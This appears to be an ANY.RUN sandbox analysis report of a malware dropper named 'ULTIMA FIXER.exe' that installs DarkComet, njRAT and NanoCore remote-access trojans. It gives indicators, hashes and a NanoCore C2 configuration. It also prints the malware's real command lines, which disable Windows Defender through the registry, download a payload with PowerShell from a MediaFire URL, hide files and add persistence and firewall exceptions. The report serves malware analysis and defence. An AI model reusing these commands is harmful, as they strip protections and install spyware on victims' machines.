File name: ULTIMA FIXER.exe

Full analysis: https://app.any.run/tasks/dc6b736d-16a4-4b1a-ab91-75883ca32b27
Verdict: Malicious activity
Threats:

DarkComet RAT is a malicious program designed to remotely control or administer a victim's computer, steal private data and spy on the victim.

Analysis date: July 21, 2024, 18:29:49
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
rat
darkcomet
njrat
bladabindi
nanocore
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
MD5: A1B9891034AC4D37A7B1CC50E89DA311
SHA1: C1C76B120CA3647C084147FDA90E7039373042DA
SHA256: C96021DBC189AC871841CD06C7CB78FEEEDED68729EEFBFAFF18AD5425F7DB97
SSDEEP: 6144:uxU5xeIqdGkR7Pa9QRIUZvsr6iQ97/3Db4Qu+wB74fc9Kh7lZ4QB:kU5xeB37PkraN/zbfu+wB74fc9Kh7lZV

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops the executable file immediately after the start

      • ULTIMA FIXER.exe (PID: 3224)
      • powershell.exe (PID: 740)
      • csrss.exe (PID: 3856)
      • WINCHECK.EXE (PID: 3092)
      • WINDOWS UPDT.EXE (PID: 3080)
      • ULTINJ.EXE (PID: 3936)
      • csrss.exe (PID: 184)
    • Disables Windows Defender

      • reg.exe (PID: 2960)
      • reg.exe (PID: 540)
      • reg.exe (PID: 2348)
      • reg.exe (PID: 1504)
    • Starts SC.EXE for service management

      • cmd.exe (PID: 3208)
    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 3208)
    • Changes the autorun value in the registry

      • WINCHECK.EXE (PID: 3092)
      • WINDOWS UPDT.EXE (PID: 3080)
      • csrss.exe (PID: 1608)
      • csrss.exe (PID: 184)
    • Changes the login/logoff helper path in the registry

      • WINCHECK.EXE (PID: 3092)
    • NjRAT is detected

      • ULTINJ.EXE (PID: 3936)
      • csrss.exe (PID: 184)
    • Create files in the Startup directory

      • csrss.exe (PID: 184)
    • NANOCORE has been detected (YARA)

      • WINDOWS UPDT.EXE (PID: 3080)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • ULTIMA FIXER.exe (PID: 3224)
      • WINCHECK.EXE (PID: 3092)
    • Reads security settings of Internet Explorer

      • ULTIMA FIXER.exe (PID: 3224)
      • WINCHECK.EXE (PID: 3092)
      • csrss.exe (PID: 3856)
      • ULTINJ.EXE (PID: 3936)
    • Executing commands from a ".bat" file

      • ULTIMA FIXER.exe (PID: 3224)
    • Uses ICACLS.EXE to modify access control lists

      • cmd.exe (PID: 3208)
    • Reads the Internet Settings

      • ULTIMA FIXER.exe (PID: 3224)
      • powershell.exe (PID: 740)
      • WINCHECK.EXE (PID: 3092)
      • csrss.exe (PID: 3856)
      • powershell.exe (PID: 3132)
      • powershell.exe (PID: 4060)
      • ULTINJ.EXE (PID: 3936)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 3208)
    • Starts SC.EXE for service management

      • cmd.exe (PID: 3208)
    • Request a resource from the Internet using PowerShell's cmdlet

      • cmd.exe (PID: 3208)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 3208)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 740)
      • csrss.exe (PID: 3856)
      • WINCHECK.EXE (PID: 3092)
      • WINDOWS UPDT.EXE (PID: 3080)
      • ULTINJ.EXE (PID: 3936)
      • csrss.exe (PID: 184)
    • Adds/modifies Windows certificates

      • powershell.exe (PID: 740)
    • The process creates files with name similar to system file names

      • powershell.exe (PID: 740)
      • WINCHECK.EXE (PID: 3092)
      • ULTINJ.EXE (PID: 3936)
    • The executable file from the user directory is run by the CMD process

      • csrss.exe (PID: 3856)
    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 3208)
    • Downloads file from URI

      • powershell.exe (PID: 740)
    • Using PowerShell to operate with local accounts

      • powershell.exe (PID: 3132)
      • powershell.exe (PID: 4060)
    • Starts itself from another location

      • WINCHECK.EXE (PID: 3092)
      • ULTINJ.EXE (PID: 3936)
    • Reads the date of Windows installation

      • WINCHECK.EXE (PID: 3092)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 3116)
      • cmd.exe (PID: 524)
    • Start notepad (likely ransomware note)

      • csrss.exe (PID: 1608)
    • Uses NETSH.EXE to add a firewall rule or allowed programs

      • csrss.exe (PID: 184)
    • Connects to unusual port

      • WINDOWS UPDT.EXE (PID: 3080)
      • csrss.exe (PID: 1608)
  • INFO

    • Checks supported languages

      • ULTIMA FIXER.exe (PID: 3224)
      • csrss.exe (PID: 3856)
      • wmpnscfg.exe (PID: 2080)
      • WINDOWS UPDT.EXE (PID: 3080)
      • WINCHECK.EXE (PID: 3092)
      • ULTINJ.EXE (PID: 3936)
      • csrss.exe (PID: 1608)
      • csrss.exe (PID: 184)
    • Create files in a temporary directory

      • ULTIMA FIXER.exe (PID: 3224)
    • Reads the computer name

      • ULTIMA FIXER.exe (PID: 3224)
      • wmpnscfg.exe (PID: 2080)
      • WINCHECK.EXE (PID: 3092)
      • csrss.exe (PID: 3856)
      • csrss.exe (PID: 1608)
      • ULTINJ.EXE (PID: 3936)
      • WINDOWS UPDT.EXE (PID: 3080)
      • csrss.exe (PID: 184)
    • Disables trace logs

      • powershell.exe (PID: 740)
    • Creates files or folders in the user directory

      • csrss.exe (PID: 3856)
      • WINDOWS UPDT.EXE (PID: 3080)
      • ULTINJ.EXE (PID: 3936)
      • csrss.exe (PID: 184)
    • Manual execution by a user

      • wmpnscfg.exe (PID: 2080)
    • Reads the machine GUID from the registry

      • WINCHECK.EXE (PID: 3092)
      • WINDOWS UPDT.EXE (PID: 3080)
      • ULTINJ.EXE (PID: 3936)
      • csrss.exe (PID: 184)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 3132)
      • powershell.exe (PID: 4060)
    • Process checks whether UAC notifications are on

      • WINDOWS UPDT.EXE (PID: 3080)
    • Creates files in the program directory

      • WINDOWS UPDT.EXE (PID: 3080)
    • Reads Environment values

      • WINDOWS UPDT.EXE (PID: 3080)
      • csrss.exe (PID: 184)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Nanocore

(PID) Process: (3080) WINDOWS UPDT.EXE
BuildTime: 2024-07-07 19:08:34.420008
Version: 1.2.2.0
Mutex: 0408a841-44c1-40dc-87b4-2422bb58fa5d
DefaultGroup: Default
PrimaryConnectionHost: jvjv2044duck33.duckdns.org
BackupConnectionHost: jvjv2044duck33.duckdns.org
ConnectionPort: 8808
RunOnStartup: True
RequestElevation: False
BypassUserAccountControl: False
ClearZoneIdentifier: True
ClearAccessControl: False
SetCriticalProcess: False
PreventSystemSleep: True
ActivateAwayMode: False
EnableDebugMode: False
RunDelay: 0
ConnectDelay: 4000
RestartDelay: 5000
TimeoutInterval: 5000
KeepAliveTimeout: 30000
MutexTimeout: 5000
LanTimeout: 2500
WanTimeout: 8000
BufferSize: 65535
MaxPacketSize: 10485760
GCThreshold: 10485760
UseCustomDnsServer: True
PrimaryDnsServer: 8.8.8.8
BackupDnsServer: 8.8.4.4
No Malware configuration.

TRiD

.exe | UPX compressed Win32 Executable (64.1)
.dll | Win32 Dynamic Link Library (generic) (15.5)
.exe | Win32 Executable (generic) (10.6)
.exe | Generic Win/DOS Executable (4.7)
.exe | DOS Executable Generic (4.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2019:07:30 08:52:50+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
PEType: PE32
LinkerVersion: 2.5
CodeSize: 49152
InitializedDataSize: 147456
UninitializedDataSize: 212992
EntryPoint: 0x3f9a0
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
No data.
Total processes: 75
Monitored processes: 31
Malicious processes: 9
Suspicious processes: 4

Behavior graph (flattened node list, in graph order)

start, ultima fixer.exe, cmd.exe (no specs), cacls.exe (no specs), reg.exe (no specs), reg.exe (no specs), reg.exe (no specs), reg.exe (no specs), reg.exe (no specs), sc.exe (no specs), sc.exe (no specs), reg.exe (no specs), wmpnscfg.exe (no specs), reg.exe (no specs), powershell.exe, csrss.exe, reg.exe (no specs), reg.exe (no specs), powershell.exe (no specs), #NJRAT ultinj.exe, wincheck.exe, #NANOCORE windows updt.exe, cmd.exe (no specs), cmd.exe (no specs), attrib.exe (no specs), attrib.exe (no specs), powershell.exe (no specs), csrss.exe, notepad.exe (no specs), #NJRAT csrss.exe, netsh.exe (no specs), ultima fixer.exe (no specs)

Process information (PID, CMD, Path, Indicators, Parent process)
PID 184 | Parent process: ULTINJ.EXE
CMD: "C:\Users\admin\AppData\Roaming\csrss.exe"
Path: C:\Users\admin\AppData\Roaming\csrss.exe
User: admin | Integrity Level: HIGH
Modules (images):
c:\users\admin\appdata\roaming\csrss.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
PID 524 | Parent process: WINCHECK.EXE
CMD: "C:\Windows\System32\cmd.exe" /k attrib "C:\Users\admin\AppData\Roaming" +s +h
Path: C:\Windows\System32\cmd.exe
User: admin | Company: Microsoft Corporation | Integrity Level: HIGH
Description: Windows Command Processor | Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules (images):
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID 540 | Parent process: cmd.exe
CMD: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
Path: C:\Windows\System32\reg.exe
User: admin | Company: Microsoft Corporation | Integrity Level: HIGH
Description: Registry Console Tool | Exit code: 0 | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID 596 | Parent process: cmd.exe
CMD: reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "MyApp" /d "C:\Users\admin\AppData\Local\Temp\csrss.exe" /f
Path: C:\Windows\System32\reg.exe
User: admin | Company: Microsoft Corporation | Integrity Level: HIGH
Description: Registry Console Tool | Exit code: 1 | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID 660 | Parent process: csrss.exe
CMD: netsh firewall add allowedprogram "C:\Users\admin\AppData\Roaming\csrss.exe" "csrss.exe" ENABLE
Path: C:\Windows\System32\netsh.exe
User: admin | Company: Microsoft Corporation | Integrity Level: HIGH
Description: Network Command Shell | Exit code: 0 | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\system32\netsh.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\credui.dll
c:\windows\system32\user32.dll
PID 740 | Parent process: cmd.exe
CMD: powershell -Command "Invoke-WebRequest -Uri https://download1323.mediafire.com/1q4kgifhu8pgykFeVB3pqUr-YyH0I5yvzRSURgjXaKV5FOwOthRh5rDQ1HsyQqaKlggn8KIw2CVwgL3fe0zEkL3vDST-NvUjGve5l-f5GqpISbZ6J17STpB0CbfUL7HcgjClYPmvJcxfdRYSI0dyztaVx6xq8xKQuVAEVWNsqahAtA/iw2p62wnaxxm809/csrss.exe -OutFile C:\Users\admin\AppData\Local\Temp\csrss.exe"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
User: admin | Company: Microsoft Corporation | Integrity Level: HIGH
Description: Windows PowerShell | Exit code: 0 | Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID 764 | Parent process: cmd.exe
CMD: attrib "C:\Users\admin\AppData\Roaming\WINCHECK.EXE" +s +h
Path: C:\Windows\System32\attrib.exe
User: admin | Company: Microsoft Corporation | Integrity Level: HIGH
Description: Attribute Utility | Exit code: 0 | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\system32\attrib.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ulib.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID 1044 | Parent process: cmd.exe
CMD: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
Path: C:\Windows\System32\reg.exe
User: admin | Company: Microsoft Corporation | Integrity Level: HIGH
Description: Registry Console Tool | Exit code: 0 | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID 1504 | Parent process: cmd.exe
CMD: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
Path: C:\Windows\System32\reg.exe
User: admin | Company: Microsoft Corporation | Integrity Level: HIGH
Description: Registry Console Tool | Exit code: 0 | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID 1608 | Parent process: WINCHECK.EXE
CMD: "C:\Users\admin\Documents\MSDCSC\csrss.exe"
Path: C:\Users\admin\Documents\MSDCSC\csrss.exe
User: admin | Company: Microsoft Corp. | Integrity Level: HIGH
Description: Remote Service Application | Version: 1, 0, 0, 1
Modules (images):
c:\users\admin\documents\msdcsc\csrss.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\avicap32.dll
c:\windows\system32\user32.dll
Total events: 21 791
Read events: 21 588
Write events: 201
Delete events: 2

Modification events

(PID) Process: (3224) ULTIMA FIXER.exe | Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | Operation: write | Name: ProxyBypass | Value: 1
(PID) Process: (3224) ULTIMA FIXER.exe | Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | Operation: write | Name: IntranetName | Value: 1
(PID) Process: (3224) ULTIMA FIXER.exe | Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | Operation: write | Name: UNCAsIntranet | Value: 1
(PID) Process: (3224) ULTIMA FIXER.exe | Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | Operation: write | Name: AutoDetect | Value: 0
(PID) Process: (2960) reg.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender | Operation: write | Name: DisableAntiSpyware | Value: 1
(PID) Process: (2944) reg.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | Operation: write | Name: DisableRealtimeMonitoring | Value: 1
(PID) Process: (540) reg.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | Operation: write | Name: DisableBehaviorMonitoring | Value: 1
(PID) Process: (2348) reg.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | Operation: write | Name: DisableOnAccessProtection | Value: 1
(PID) Process: (1504) reg.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | Operation: write | Name: DisableScanOnRealtimeEnable | Value: 1
(PID) Process: (1044) reg.exe | Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | Operation: write | Name: DisableRegistryTools | Value: 1
Executable files: 8
Suspicious files: 7
Text files: 2
Unknown types: 0

Dropped files

PID | Process | Filename | Type
3224 | ULTIMA FIXER.exe | C:\Users\admin\AppData\Local\Temp\E2AB.tmp\E2AC.tmp\E2AD.bat | text
  MD5: F08DA42187B78D04D21C8498CB0CDA50 | SHA256: 1633D8B4E65CF51C127FC2222A96EA08E7BBFD0D028F7E712C4E3E7291E1A211
3092 | WINCHECK.EXE | C:\Users\admin\Documents\MSDCSC\csrss.exe | executable
  MD5: C018FE852FFA46A996C7A742E71B1745 | SHA256: 73977EED3E647ABB02D8C53FD758E2725E78E545643BC01C4002044921A49FA2
740 | powershell.exe | C:\Users\admin\AppData\Local\Temp\nrpjp5u1.yjx.ps1 | binary
  MD5: C4CA4238A0B923820DCC509A6F75849B | SHA256:
740 | powershell.exe | C:\Users\admin\AppData\Local\Temp\csrss.exe | executable
  MD5: D110630B6914840324E5B4F8A1867A07 | SHA256: 2C45376F0C9DB528F1D7593278CE8E4C0372F3B5F0D34BE9FE8E0552784DB120
3080 | WINDOWS UPDT.EXE | C:\Users\admin\AppData\Roaming\90059C37-1320-41A4-B58D-2B75A9850D2F\run.dat | text
  MD5: 6F9AD3BE88DE0D7B50729C82E3697155 | SHA256: 4231BB2160AF64C59AA640B79CDE1F65E69A839EEB7617A74A08538D970E206E
3132 | powershell.exe | C:\Users\admin\AppData\Local\Temp\r25qd13c.p4d.ps1 | binary
  MD5: C4CA4238A0B923820DCC509A6F75849B | SHA256:
3856 | csrss.exe | C:\Users\admin\AppData\Roaming\WINDOWS UPDT.EXE | executable
  MD5: 15C30B1CA1E7FF0A779C350A19925B94 | SHA256: B7358F8AFF742EB85C89D1B7CF57DB1F0842DAB6E576AE68C959522EA6CB01B6
3132 | powershell.exe | C:\Users\admin\AppData\Local\Temp\hrkwzshu.ud3.psm1 | binary
  MD5: C4CA4238A0B923820DCC509A6F75849B | SHA256:
740 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary
  MD5: 446DD1CF97EABA21CF14D03AEBC79F27 | SHA256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
740 | powershell.exe | C:\Users\admin\AppData\Local\Temp\mwdzk014.yuc.psm1 | binary
  MD5: C4CA4238A0B923820DCC509A6F75849B | SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 0
TCP/UDP connections: 11
DNS requests: 4
Threats: 9

HTTP requests

No HTTP requests

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
4 | System | 224.0.0.252:5355 | - | - | - | whitelisted
1372 | svchost.exe | 4.231.128.59:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
1060 | svchost.exe | 224.0.0.252:5355 | - | - | - | whitelisted
2564 | svchost.exe | 239.255.255.250:3702 | - | - | - | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
740 | powershell.exe | 205.196.123.11:443 | download1323.mediafire.com | MEDIAFIRE | US | unknown
1608 | csrss.exe | 78.177.68.243:1604 | jvjv2044duck33.duckdns.org | Turk Telekom | TR | unknown
3080 | WINDOWS UPDT.EXE | 78.177.68.243:8808 | jvjv2044duck33.duckdns.org | Turk Telekom | TR | unknown

DNS requests

Domain | IP | Reputation
google.com | 216.58.212.174 | whitelisted
download1323.mediafire.com | 205.196.123.11 | whitelisted
jvjv2044duck33.duckdns.org | 78.177.68.243 | malicious

Threats

PID | Process | Class | Message
1060 | svchost.exe | Potentially Bad Traffic | ET HUNTING File Sharing Related Domain in DNS Lookup (download .mediafire .com)
1060 | svchost.exe | Potentially Bad Traffic | ET INFO DYNAMIC_DNS Query to a *.duckdns .org Domain
3080 | WINDOWS UPDT.EXE | Potentially Bad Traffic | ET INFO DYNAMIC_DNS Query to a *.duckdns .org Domain
1060 | svchost.exe | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3080 | WINDOWS UPDT.EXE | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
1060 | svchost.exe | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
1060 | svchost.exe | Potentially Bad Traffic | ET INFO DYNAMIC_DNS Query to a *.duckdns .org Domain
2 ETPRO signatures available at the full report
Process | Message
csrss.exe | C:\Users\admin\AppData\Roaming\ULTINJ.EXE
csrss.exe | C:\Users\admin\AppData\Roaming\WINCHECK.EXE
csrss.exe | C:\Users\admin\AppData\Roaming\WINDOWS UPDT.EXE